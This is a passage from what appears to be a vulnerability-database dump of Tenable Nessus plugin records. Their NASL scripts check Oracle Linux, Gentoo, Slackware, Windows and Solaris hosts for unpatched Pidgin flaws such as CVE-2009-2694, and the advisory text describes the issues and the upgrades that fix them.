"p-cpe:/a:oracle:linux:finch-devel", "p-cpe:/a:oracle:linux:libpurple-perl", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:pidgin-devel"], "id": "ORACLELINUX_ELSA-2009-1218.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67912", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1218 and \n# Oracle Linux Security Advisory ELSA-2009-1218 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67912);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-2694\", \"CVE-2009-3025\", \"CVE-2009-3026\");\n script_xref(name:\"RHSA\", value:\"2009:1218\");\n\n script_name(english:\"Oracle Linux 3 / 4 : pidgin (ELSA-2009-1218)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1218 :\n\nUpdated pidgin packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in\nPidgin's MSN protocol handler. If a user received a malicious MSN\nmessage, it was possible to execute arbitrary code with the\npermissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages\nfrom users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which\nresolve this issue. Pidgin must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-August/001125.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-August/001127.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"pidgin-1.5.1-4.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"pidgin-1.5.1-4.el3\")) flag++;\n\nif (rpm_check(release:\"EL4\", reference:\"finch-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"finch-devel-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-devel-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-perl-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-tcl-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-devel-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-perl-2.5.9-1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:34:33", "references": ["https://www.gentoo.org/security/en/glsa/glsa-200905-07.xml", "https://security.gentoo.org/glsa/200910-02"], "pluginID": "42214", "description": "The remote host is affected by the vulnerability described in GLSA-200910-02 (Pidgin: Multiple vulnerabilities)\n\n Multiple vulnerabilities were found in Pidgin:\n Yuriy Kaminskiy reported that the OSCAR protocol implementation in Pidgin misinterprets the ICQWebMessage message type as the ICQSMS message type, triggering an allocation of a large amount of memory (CVE-2009-1889).\n Federico Muttis of Core Security Technologies reported that the msn_slplink_process_msg() function in libpurple/protocols/msn/slplink.c in libpurple as used in Pidgin doesn't properly process incoming SLP messages, triggering an overwrite of an arbitrary memory location (CVE-2009-2694). NOTE: This issue reportedly exists because of an incomplete fix for CVE-2009-1376 (GLSA 200905-07).\n bugdave reported that protocols/jabber/auth.c in libpurple as used in Pidgin does not follow the 'require TSL/SSL' preference when connecting to older Jabber servers that do not follow the XMPP specification, resulting in a connection to the server without the expected encryption (CVE-2009-3026).\n Impact :\n\n A remote attacker could send specially crafted SLP (via MSN) or ICQ web messages, possibly leading to execution of arbitrary code with the privileges of the user running Pidgin, unauthorized information disclosure, or a Denial of Service.\n Workaround :\n\n There is no known workaround at this time.", "edition": 8, "reporter": "Tenable", "published": "2009-10-23T00:00:00", "title": "GLSA-200910-02 : Pidgin: Multiple vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-3026", "CVE-2009-1889", "CVE-2009-2694"], "modified": "2018-06-29T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:pidgin"], "id": "GENTOO_GLSA-200910-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42214", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200910-02.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42214);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/06/29 12:01:00\");\n\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-1889\", \"CVE-2009-2694\", \"CVE-2009-3026\");\n script_bugtraq_id(35067, 35530, 36071);\n script_xref(name:\"GLSA\", value:\"200910-02\");\n\n script_name(english:\"GLSA-200910-02 : Pidgin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200910-02\n(Pidgin: Multiple vulnerabilities)\n\n Multiple vulnerabilities were found in Pidgin:\n Yuriy\n Kaminskiy reported that the OSCAR protocol implementation in Pidgin\n misinterprets the ICQWebMessage message type as the ICQSMS message\n type, triggering an allocation of a large amount of memory\n (CVE-2009-1889).\n Federico Muttis of Core Security Technologies\n reported that the msn_slplink_process_msg() function in\n libpurple/protocols/msn/slplink.c in libpurple as used in Pidgin\n doesn't properly process incoming SLP messages, triggering an overwrite\n of an arbitrary memory location (CVE-2009-2694). NOTE: This issue\n reportedly exists because of an incomplete fix for CVE-2009-1376 (GLSA\n 200905-07).\n bugdave reported that protocols/jabber/auth.c in\n libpurple as used in Pidgin does not follow the 'require TSL/SSL'\n preference when connecting to older Jabber servers that do not follow\n the XMPP specification, resulting in a connection to the server without\n the expected encryption (CVE-2009-3026).\n \nImpact :\n\n A remote attacker could send specially crafted SLP (via MSN) or ICQ web\n messages, possibly leading to execution of arbitrary code with the\n privileges of the user running Pidgin, unauthorized information\n disclosure, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.gentoo.org/security/en/glsa/glsa-200905-07.xml\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200910-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Pidgin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/pidgin-2.5.9-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/pidgin\", unaffected:make_list(\"ge 2.5.9-r1\"), vulnerable:make_list(\"lt 2.5.9-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Pidgin\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:54:18", "references": ["http://www.nessus.org/u?3ba1f79e"], "pluginID": "40624", "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and\n-current to fix a security issue.", "edition": 4, "reporter": "Tenable", "published": "2009-08-20T00:00:00", "title": "Slackware 12.0 / 12.1 / 12.2 / current : pidgin (SSA:2009-231-02)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2015-03-30T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux:12.2", "p-cpe:/a:slackware:slackware_linux:pidgin", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.1"], "id": "SLACKWARE_SSA_2009-231-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40624", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2009-231-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40624);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2015/03/30 13:52:22 $\");\n\n script_cve_id(\"CVE-2009-2694\");\n script_bugtraq_id(36071);\n script_xref(name:\"SSA\", value:\"2009-231-02\");\n\n script_name(english:\"Slackware 12.0 / 12.1 / 12.2 / current : pidgin (SSA:2009-231-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and\n-current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.423964\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ba1f79e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"12.0\", pkgname:\"pidgin\", pkgver:\"2.5.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"pidgin\", pkgver:\"2.5.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"pidgin\", pkgver:\"2.5.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"pidgin\", pkgver:\"2.5.9\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"pidgin\", pkgver:\"2.5.9\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:50:46", "references": ["http://pidgin.im/news/security/?id=34", "http://www.coresecurity.com/content/libpurple-arbitrary-write", "http://seclists.org/bugtraq/2009/Aug/174"], "pluginID": "40663", "description": "The version of Pidgin installed on the remote host is earlier than 2.5.9. Such versions are reportedly affected by a vulnerability in 'msn_slplink_process_msg()'. Maliciously crafted MSN SLP messages can result in memory corruption. A remote attacker could use this to crash the client, or execute arbitrary code.\n\nThis attack does not require user interaction or that the attacker is in the victim's buddy list (using the default configuration).", "edition": 6, "reporter": "Tenable", "published": "2009-08-20T00:00:00", "title": "Pidgin < 2.5.9 'msn_slplink_process_msg()' Memory Corruption", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/a:pidgin:pidgin"], "id": "PIDGIN_2_5_9.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40663", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(40663);\n script_version(\"1.10\");\n\n script_cve_id(\"CVE-2009-2694\");\n script_bugtraq_id(36071);\n script_xref(name:\"Secunia\", value:\"36384\");\n\n script_name(english:\"Pidgin < 2.5.9 'msn_slplink_process_msg()' Memory Corruption\");\n script_summary(english:\"Does a version check\");\n\n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote host has an instant messaging client that is affected by a\nmemory corruption vulnerability.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The version of Pidgin installed on the remote host is earlier than\n2.5.9. Such versions are reportedly affected by a vulnerability in\n'msn_slplink_process_msg()'. Maliciously crafted MSN SLP messages\ncan result in memory corruption. A remote attacker could use this to\ncrash the client, or execute arbitrary code.\n\nThis attack does not require user interaction or that the attacker\nis in the victim's buddy list (using the default configuration).\" );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.coresecurity.com/content/libpurple-arbitrary-write\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://seclists.org/bugtraq/2009/Aug/174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://pidgin.im/news/security/?id=34\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Pidgin 2.5.9 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n script_set_attribute(\n attribute:\"vuln_publication_date\",\n value:\"2009/08/18\"\n );\n script_set_attribute(\n attribute:\"patch_publication_date\",\n value:\"2009/08/18\"\n );\n script_set_attribute(\n attribute:\"plugin_publication_date\",\n value:\"2009/08/20\"\n );\n script_cvs_date(\"Date: 2018/07/24 18:56:13\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pidgin:pidgin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"pidgin_installed.nasl\");\n script_require_keys(\"SMB/Pidgin/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\nversion = get_kb_item(\"SMB/Pidgin/Version\");\nif (isnull(version)) exit(1, \"The 'SMB/Pidgin/Version' KB item is missing.\");\n\nver_fields = split(version, sep:'.', keep:FALSE);\nmajor = int(ver_fields[0]);\nminor = int(ver_fields[1]);\nrev = int(ver_fields[2]);\n\n# Versions < 2.5.9 are affected\nif (\n major < 2 ||\n (major == 2 && minor < 5) ||\n (major == 2 && minor == 5 && rev < 9)\n)\n{\n port = get_kb_item(\"SMB/transport\");\n\n if(report_verbosity > 0)\n {\n report = string(\n \"\\n\",\n \" Installed version : \", version, \"\\n\",\n \" Should be at least : 2.5.9\\n\"\n );\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse exit(0, \"Version \" + version + \" is not affected.\");\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:38:47", "references": ["https://getupdates.oracle.com/readme/119549-14"], "pluginID": "107822", "description": "GNOME 2.6.0_x86: Gnome Multi-protocol instant messaging client Pat.\nDate this patch was last updated by Sun : Dec/11/09", "edition": 3, "reporter": "Tenable", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119549-14", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2018-03-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_119549-14.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=107822", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107822);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/03/14 12:59:00\");\n\n script_cve_id(\"CVE-2009-2694\");\n\n script_name(english:\"Solaris 10 (x86) : 119549-14\");\n script_summary(english:\"Check for patch 119549-14\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119549-14\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"GNOME 2.6.0_x86: Gnome Multi-protocol instant messaging client Pat.\nDate this patch was last updated by Sun : Dec/11/09\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119549-14\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119549-14\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119549-14\", obsoleted_by:\"\", package:\"SUNWgnome-im-client-share\", version:\"2.6.0,REV=10.0.3.2004.12.16.18.56\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119549-14\", obsoleted_by:\"\", package:\"SUNWgnome-im-client\", version:\"2.6.0,REV=10.0.3.2004.12.16.18.56\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWgnome-im-client / SUNWgnome-im-client-share\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:52:46", "references": ["https://getupdates.oracle.com/readme/119548-14"], "pluginID": "107319", "description": "GNOME 2.6.0: Gnome Multi-protocol instant messaging client Patch.\nDate this patch was last updated by Sun : Dec/14/09", "edition": 3, "reporter": "Tenable", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119548-14", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2018-03-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": 